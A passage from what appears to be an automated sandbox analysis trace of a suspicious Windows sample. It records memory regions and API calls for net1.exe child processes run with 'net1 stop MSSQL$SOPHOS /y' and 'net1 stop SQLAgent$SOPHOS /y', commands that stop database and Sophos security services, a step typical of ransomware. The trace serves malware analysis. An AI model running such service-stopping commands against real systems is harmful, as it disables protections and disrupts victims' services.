"\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13565 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 13566 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 13567 start_va = 0xffb10000 end_va = 0xffb42fff entry_point = 0xffb10000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 13568 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13569 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 13570 start_va = 0x7fffffd5000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 13571 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 13572 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 13573 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 13574 start_va = 0x340000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 13575 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 13576 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 13577 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 13578 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 13736 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 13737 start_va = 0xc0000 end_va = 0x1bffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 13738 start_va = 0x5f0000 end_va = 0x5fffff entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 13739 start_va = 0x7fef4380000 end_va = 0x7fef4391fff entry_point = 0x7fef4380000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 13740 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 13741 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 13742 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 13743 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 13744 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 13745 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 13746 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 13747 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 13748 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 13749 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 13750 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 13751 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 13752 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 13753 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 13754 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 13775 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 953 os_tid = 0xf30 [0122.977] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24fbb0 | out: lpSystemTimeAsFileTime=0x24fbb0*(dwLowDateTime=0xfe6d1430, dwHighDateTime=0x1d48689)) [0122.977] GetCurrentProcessId () returned 0xf34 [0122.977] GetCurrentThreadId () returned 0xf30 [0122.977] GetTickCount () returned 0x28600 [0122.977] QueryPerformanceCounter (in: lpPerformanceCount=0x24fbb8 | out: lpPerformanceCount=0x24fbb8*=1816989500000) returned 1 [0122.977] GetModuleHandleW (lpModuleName=0x0) returned 0xffb10000 [0122.977] __set_app_type (_Type=0x1) [0122.977] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffb29c9c) returned 0x0 [0122.977] __getmainargs (in: _Argc=0xffb34780, _Argv=0xffb34790, _Env=0xffb34788, _DoWildCard=0, _StartInfo=0xffb3479c | out: _Argc=0xffb34780, _Argv=0xffb34790, _Env=0xffb34788) returned 0 [0122.978] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0122.978] GetConsoleOutputCP () returned 0x1b5 [0122.985] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffb3cec0 | out: lpCPInfo=0xffb3cec0) returned 1 [0122.985] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0122.987] sprintf_s (in: _DstBuf=0x24fb58, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0122.988] setlocale (category=0, locale=".437") returned="English_United States.437" [0122.990] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0122.990] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0122.990] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$SOPHOS /y" [0122.990] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x24f8f0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0122.990] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0122.990] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x24fb48 | out: Buffer=0x24fb48*=0x354d50) returned 0x0 [0122.990] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x24fb48 | out: Buffer=0x24fb48*=0x35c100) returned 0x0 [0122.990] _fileno (_File=0x7fefdba2a80) returned 0 [0122.990] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0122.991] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0122.991] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0122.991] _wcsicmp (_String1="config", _String2="stop") returned -16 [0122.991] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0122.991] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0122.991] _wcsicmp (_String1="file", _String2="stop") returned -13 [0122.991] _wcsicmp (_String1="files", _String2="stop") returned -13 [0122.991] _wcsicmp (_String1="group", _String2="stop") returned -12 [0122.991] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0122.991] _wcsicmp (_String1="help", _String2="stop") returned -11 [0122.991] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0122.991] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0122.991] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0122.991] _wcsicmp (_String1="session", _String2="stop") returned -15 [0122.991] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0122.991] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0122.991] _wcsicmp (_String1="share", _String2="stop") returned -12 [0122.991] _wcsicmp (_String1="start", _String2="stop") returned -14 [0122.991] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0122.991] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0122.991] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0122.991] _wcsicmp (_String1="accounts", _String2="MSSQL$SOPHOS") returned -12 [0122.991] _wcsicmp (_String1="computer", _String2="MSSQL$SOPHOS") returned -10 [0122.991] _wcsicmp (_String1="config", _String2="MSSQL$SOPHOS") returned -10 [0122.991] _wcsicmp (_String1="continue", _String2="MSSQL$SOPHOS") returned -10 [0122.991] _wcsicmp (_String1="cont", _String2="MSSQL$SOPHOS") returned -10 [0122.991] _wcsicmp (_String1="file", _String2="MSSQL$SOPHOS") returned -7 [0122.991] _wcsicmp (_String1="files", _String2="MSSQL$SOPHOS") returned -7 [0122.991] _wcsicmp (_String1="group", _String2="MSSQL$SOPHOS") returned -6 [0122.991] _wcsicmp (_String1="groups", _String2="MSSQL$SOPHOS") returned -6 [0122.991] _wcsicmp (_String1="help", _String2="MSSQL$SOPHOS") returned -5 [0122.991] _wcsicmp (_String1="helpmsg", _String2="MSSQL$SOPHOS") returned -5 [0122.991] _wcsicmp (_String1="localgroup", _String2="MSSQL$SOPHOS") returned -1 [0122.991] _wcsicmp (_String1="pause", _String2="MSSQL$SOPHOS") returned 3 [0122.991] _wcsicmp (_String1="session", _String2="MSSQL$SOPHOS") returned 6 [0122.991] _wcsicmp (_String1="sessions", _String2="MSSQL$SOPHOS") returned 6 [0122.991] _wcsicmp (_String1="sess", _String2="MSSQL$SOPHOS") returned 6 [0122.991] _wcsicmp (_String1="share", _String2="MSSQL$SOPHOS") returned 6 [0122.991] _wcsicmp (_String1="start", _String2="MSSQL$SOPHOS") returned 6 [0122.992] _wcsicmp (_String1="stats", _String2="MSSQL$SOPHOS") returned 6 [0122.992] _wcsicmp (_String1="statistics", _String2="MSSQL$SOPHOS") returned 6 [0122.992] _wcsicmp (_String1="stop", _String2="MSSQL$SOPHOS") returned 6 [0122.992] _wcsicmp (_String1="time", _String2="MSSQL$SOPHOS") returned 7 [0122.992] _wcsicmp (_String1="user", _String2="MSSQL$SOPHOS") returned 8 [0122.992] _wcsicmp (_String1="users", _String2="MSSQL$SOPHOS") returned 8 [0122.992] _wcsicmp (_String1="msg", _String2="MSSQL$SOPHOS") returned -12 [0122.992] _wcsicmp (_String1="messenger", _String2="MSSQL$SOPHOS") returned -14 [0122.992] _wcsicmp (_String1="receiver", _String2="MSSQL$SOPHOS") returned 5 [0122.992] _wcsicmp (_String1="rcv", _String2="MSSQL$SOPHOS") returned 5 [0122.992] _wcsicmp (_String1="netpopup", _String2="MSSQL$SOPHOS") returned 1 [0122.992] _wcsicmp (_String1="redirector", _String2="MSSQL$SOPHOS") returned 5 [0122.992] _wcsicmp (_String1="redir", _String2="MSSQL$SOPHOS") returned 5 [0122.992] _wcsicmp (_String1="rdr", _String2="MSSQL$SOPHOS") returned 5 [0122.992] _wcsicmp (_String1="workstation", _String2="MSSQL$SOPHOS") returned 10 [0122.992] _wcsicmp (_String1="work", _String2="MSSQL$SOPHOS") returned 10 [0122.992] _wcsicmp (_String1="wksta", _String2="MSSQL$SOPHOS") returned 10 [0122.992] _wcsicmp (_String1="prdr", _String2="MSSQL$SOPHOS") returned 3 [0122.992] _wcsicmp (_String1="devrdr", _String2="MSSQL$SOPHOS") returned -9 [0122.992] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$SOPHOS") returned -1 [0122.992] _wcsicmp (_String1="server", _String2="MSSQL$SOPHOS") returned 6 [0122.992] _wcsicmp (_String1="svr", _String2="MSSQL$SOPHOS") returned 6 [0122.992] _wcsicmp (_String1="srv", _String2="MSSQL$SOPHOS") returned 6 [0122.992] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$SOPHOS") returned -1 [0122.992] _wcsicmp (_String1="alerter", _String2="MSSQL$SOPHOS") returned -12 [0122.992] _wcsicmp (_String1="netlogon", _String2="MSSQL$SOPHOS") returned 1 [0122.992] _wcsupr (in: _String="MSSQL$SOPHOS" | out: _String="MSSQL$SOPHOS") returned="MSSQL$SOPHOS" [0122.992] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x35ce10 [0123.005] GetServiceKeyNameW (in: hSCManager=0x35ce10, lpDisplayName="MSSQL$SOPHOS", lpServiceName=0xffb35750, lpcchBuffer=0x24fa68 | out: lpServiceName="", lpcchBuffer=0x24fa68) returned 0 [0123.013] _wcsicmp (_String1="msg", _String2="MSSQL$SOPHOS") returned -12 [0123.013] _wcsicmp (_String1="messenger", _String2="MSSQL$SOPHOS") returned -14 [0123.013] _wcsicmp (_String1="receiver", _String2="MSSQL$SOPHOS") returned 5 [0123.013] _wcsicmp (_String1="rcv", _String2="MSSQL$SOPHOS") returned 5 [0123.013] _wcsicmp (_String1="redirector", _String2="MSSQL$SOPHOS") returned 5 [0123.013] _wcsicmp (_String1="redir", _String2="MSSQL$SOPHOS") returned 5 [0123.013] _wcsicmp (_String1="rdr", _String2="MSSQL$SOPHOS") returned 5 [0123.013] _wcsicmp (_String1="workstation", _String2="MSSQL$SOPHOS") returned 10 [0123.013] _wcsicmp (_String1="work", _String2="MSSQL$SOPHOS") returned 10 [0123.013] _wcsicmp (_String1="wksta", _String2="MSSQL$SOPHOS") returned 10 [0123.013] _wcsicmp (_String1="prdr", _String2="MSSQL$SOPHOS") returned 3 [0123.013] _wcsicmp (_String1="devrdr", _String2="MSSQL$SOPHOS") returned -9 [0123.013] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$SOPHOS") returned -1 [0123.013] _wcsicmp (_String1="server", _String2="MSSQL$SOPHOS") returned 6 [0123.013] _wcsicmp (_String1="svr", _String2="MSSQL$SOPHOS") returned 6 [0123.013] _wcsicmp (_String1="srv", _String2="MSSQL$SOPHOS") returned 6 [0123.013] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$SOPHOS") returned -1 [0123.013] _wcsicmp (_String1="alerter", _String2="MSSQL$SOPHOS") returned -12 [0123.013] _wcsicmp (_String1="netlogon", _String2="MSSQL$SOPHOS") returned 1 [0123.013] NetServiceControl (in: servername=0x0, service="MSSQL$SOPHOS", opcode=0x0, arg=0x0, bufptr=0x24fa70 | out: bufptr=0x24fa70) returned 0x889 [0123.016] wcscpy_s (in: _Destination=0xffb380d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0123.016] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0123.016] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffb35b50, nSize=0x800, Arguments=0xffb37f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0123.018] GetFileType (hFile=0xb) returned 0x2 [0123.020] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24f938 | out: lpMode=0x24f938) returned 1 [0123.021] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb35b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x24f930, lpReserved=0x0 | out: lpBuffer=0xffb35b50*, lpNumberOfCharsWritten=0x24f930*=0x1e) returned 1 [0123.021] GetFileType (hFile=0xb) returned 0x2 [0123.022] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24f938 | out: lpMode=0x24f938) returned 1 [0123.022] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb11efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x24f930, lpReserved=0x0 | out: lpBuffer=0xffb11efc*, lpNumberOfCharsWritten=0x24f930*=0x2) returned 1 [0123.023] _ultow (in: _Dest=0x889, _Radix=2423200 | out: _Dest=0x889) returned="2185" [0123.023] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffb35b50, nSize=0x800, Arguments=0xffb37f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0123.023] GetFileType (hFile=0xb) returned 0x2 [0123.024] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24f938 | out: lpMode=0x24f938) returned 1 [0123.025] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb35b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x24f930, lpReserved=0x0 | out: lpBuffer=0xffb35b50*, lpNumberOfCharsWritten=0x24f930*=0x34) returned 1 [0123.026] GetFileType (hFile=0xb) returned 0x2 [0123.026] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24f938 | out: lpMode=0x24f938) returned 1 [0123.026] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb11efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x24f930, lpReserved=0x0 | out: lpBuffer=0xffb11efc*, lpNumberOfCharsWritten=0x24f930*=0x2) returned 1 [0123.027] NetApiBufferFree (Buffer=0x354d50) returned 0x0 [0123.027] NetApiBufferFree (Buffer=0x35c100) returned 0x0 [0123.027] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$SOPHOS /y" [0123.027] exit (_Code=2) Process: id = "396" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0xc4da000" os_pid = "0x1270" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "391" os_parent_pid = "0xcf4" cmd_line = "C:\\Windows\\system32\\net1 stop SQLAgent$SOPHOS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13579 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13580 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13581 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13582 start_va = 0x190000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 13583 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13584 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 13585 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 13586 start_va = 0xffb10000 end_va = 0xffb42fff entry_point = 0xffb10000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 13587 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13588 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 13589 start_va = 0x7fffffd5000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 13590 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 13591 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 13592 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 13593 start_va = 0x2d0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 13594 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 13595 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 13596 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 13597 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 13755 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 13756 start_va = 0x3d0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 13757 start_va = 0x540000 end_va = 0x54ffff entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 13758 start_va = 0x7fef4380000 end_va = 0x7fef4391fff entry_point = 0x7fef4380000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 13759 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 13760 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 13761 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 13762 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 13763 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 13764 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 13765 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 13766 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 13767 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 13768 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 13769 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 13770 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 13771 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 13772 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 13773 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 13776 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 954 os_tid = 0xec8 [0122.982] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20f910 | out: lpSystemTimeAsFileTime=0x20f910*(dwLowDateTime=0xfe6d1430, dwHighDateTime=0x1d48689)) [0122.982] GetCurrentProcessId () returned 0x1270 [0122.982] GetCurrentThreadId () returned 0xec8 [0122.982] GetTickCount () returned 0x28600 [0122.982] QueryPerformanceCounter (in: lpPerformanceCount=0x20f918 | out: lpPerformanceCount=0x20f918*=1816990100000) returned 1 [0122.983] GetModuleHandleW (lpModuleName=0x0) returned 0xffb10000 [0122.983] __set_app_type (_Type=0x1) [0122.983] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffb29c9c) returned 0x0 [0122.983] __getmainargs (in: _Argc=0xffb34780, _Argv=0xffb34790, _Env=0xffb34788, _DoWildCard=0, _StartInfo=0xffb3479c | out: _Argc=0xffb34780, _Argv=0xffb34790, _Env=0xffb34788) returned 0 [0122.983] HeapSetInformation (HeapHandle=0x0, 